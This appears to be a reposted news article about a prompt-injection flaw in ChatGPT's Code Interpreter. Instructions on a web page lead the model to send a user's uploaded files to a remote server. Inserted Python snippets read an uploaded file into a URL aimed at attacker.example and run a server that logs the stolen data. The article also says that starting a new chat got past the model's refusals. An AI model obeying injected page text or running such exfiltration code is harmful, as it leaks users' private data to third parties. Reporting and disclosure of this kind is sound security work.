ChatGPT's New Code Interpreter Has Giant Security Hole, Allows Hackers To Steal Your Data
Arthur T Knackerbracket has processed the following story:
ChatGPT's recently added Code Interpreter makes writing Python code with AI much more powerful, because it actually writes the code and then runs it for you in a sandboxed environment. Unfortunately, this sandboxed environment, which is also used to handle any spreadsheets you want ChatGPT to analyze and chart, is wide open to prompt injection attacks that exfiltrate your data.
Using a ChatGPT Plus account, which is necessary to get the new features, I was able to reproduce the exploit, which was first reported on Twitter by security researcher Johann Rehberger. It involves pasting a third-party URL into the chat window and then watching as the bot interprets the instructions on that web page the same way it would interpret commands the user had entered.
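To make the mechanics concrete, here is a minimal Python sketch (not taken from the article) of the kind of action injected instructions could coax the sandbox into performing: read a file the user uploaded and fold its contents into a link pointing at an attacker-controlled server. The endpoint, file path, and parameter name here are assumptions for illustration only.

```python
from urllib.parse import quote

# Hypothetical values, assumed for illustration; they are not from the article.
ATTACKER_ENDPOINT = "http://attacker.example/collect"
UPLOADED_FILE = "/mnt/data/secrets.csv"  # assumed location of the user's upload

# Read whatever the user asked ChatGPT to analyze...
with open(UPLOADED_FILE, "r") as f:
    contents = f.read()

# ...and pack it into a URL that the injected instructions tell the model
# to fetch, or to display to the user as an innocent-looking link.
exfil_url = f"{ATTACKER_ENDPOINT}?mydata={quote(contents)}"
print(exfil_url)
```

Nothing in the sandbox itself is broken here; the problem is that the model treats text it fetched from the page as instructions with the same authority as the user's own prompt.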
[...] I tried this prompt injection exploit and some variations on it several times over a few days. It worked a lot of the time, but not always. In some chat sessions, ChatGPT would refuse to load an external web page at all, but then would do so if I launched a new chat.
In other chat sessions, it would give a message saying that it was not allowed to transmit data from files this way. And in yet other sessions, the injection would work, but rather than transmitting the data directly to http://myserver.com/data.php?mydata=[DATA], it would provide a hyperlink in its response, and I would need to click that link for the data to transmit.
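On the receiving end, the article's http://myserver.com/data.php?mydata=[DATA] stands in for any endpoint that simply records the mydata query parameter. A minimal, hypothetical Python stand-in for such a collector (the .php extension suggests the real one was PHP) could look like this:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class Collector(BaseHTTPRequestHandler):
    """Log the 'mydata' query parameter of every incoming request, then return 200."""

    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        print("exfiltrated:", params.get("mydata", [""])[0])
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 8080), Collector).serve_forever()
```

Once data reaches a server like this, the exfiltration is complete whether ChatGPT fetched the URL itself or the user clicked the rendered link.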
I was also able to use the exploit after uploading a .csv file of important data for ChatGPT to analyze. So this vulnerability applies not only to code you're testing but also to spreadsheets you might want ChatGPT to use for charting or summarization.
[...] The problem is that, no matter how far-fetched it might seem, this is a security hole that shouldn't be there. ChatGPT should not follow instructions that it finds on a web page, but it does and has for a long time. We reported on ChatGPT prompt injection (via YouTube videos) back in May, after Rehberger himself responsibly disclosed the issue to OpenAI in April. The ability to upload files and run code in ChatGPT Plus is new (recently out of beta), but the ability to inject prompts from a URL, a video, or a PDF is not.
Read more of this story at SoylentNews.